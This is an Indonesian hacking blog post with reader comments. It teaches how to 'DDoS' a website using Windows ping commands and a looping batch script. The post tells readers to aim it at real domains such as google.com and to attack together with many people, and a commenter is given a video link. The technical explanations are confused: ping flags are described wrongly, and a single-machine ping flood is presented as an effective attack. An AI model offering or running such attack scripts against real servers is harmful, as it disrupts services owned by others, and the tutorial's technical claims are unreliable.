Saturday, November 26, 2016

Cara Melakukan DDOS Attack

4:13 AM

Assalamualaikum Wr . Wb
Hai bro , Nggak terasa nih udah malam minggu aja . Sesuai janji saya setiap malam minggu akan menemani malam kalian dengan postingan tips & trick hacking . dan pada kesempatan kali ini saya akan memberikan tutorial kepada kalian bagaimana cara melakukan ddos attack terhadap sebuah ip atau web server . Ok langsung saja ..Cekidot!!!


DDoS attack atau  Distributed Denial of Service attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode computer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untuk membanjiri (flood) target yang akan diserang. Server yang diserang akan lumpuh sangat cepat karena beberapa koneksi digunakan untuk melawan satu koneksi.

First Opsion Step (pilihan cara pertama)
1. Buka CMD

2. Ketikan command berikut pada cmd :
3. Ketik "ping <ip add>  -l 1000 -n 500 "


    <ip add>  IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya)
     -l  1000 :  besar ping yang dikirim server sebesar 1000 bytes
    -n 500= ukuran buffer yang dikirim 500 bytes (dapat diganti sesuka hati)
4. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out"

5. “Jika muncul tulisan pesan error pada cmd maka ubahlah ukuran dari besar bytes yang dikirimkan”

Second Opsion Step(pilihan cara kedua)
1. Buka Notepad (accesoris -> notepad)
2. Tulis script dibawah ini
@echo off
mode 67,16
title DDOS Attack By http://guruon-line.blogsot.com/
color 0b
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile By http://guruon-line.blogspot.com/
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0d
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3. Kemudian Save Menggunakan Extensi .Bat (contohDDoS.bat)

4. Setelah itu buka file yang telah kita buat tadi

5. Server-target isikan dengan nama domain / nama situs yang akan kita DDOS. misal : www.google.com

6. Setelah kita isikan server-target maka akan muncul alamat ip target, lalu pada ip host isikan ip address target kita .Lalu akan ada packet size, isikan terserah anda. misalkan 1000000000

Setelah itu tekan enter maka proses DDOS akan berjalan,

DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang. Mungin sekian yang dapat saya sampaikan .

Wassamualaikum Wr. Wb

Written by

We are Creative Blogger Theme Wavers which provides user friendly, effective and easy to use themes. Each support has free and providing HD support screen casting.

5 comments:

  1. Replies
    1. Oke gan , Mungkin ada request untuk postingan selanjutnya

      Delete
  2. gan... masih kurang jelas nih tutor nya...
    tolong dong videonya ( penasaran)

    ReplyDelete
    Replies
    1. OK ntar saya bikinin video tutorialnya

      Delete
    2. Nih gan videonya
      https://www.youtube.com/watch?v=2qNTdXrVHgY

      Delete

 

© 2013 GuruOnline. All rights resevered. Designed by Templateism

Back To Top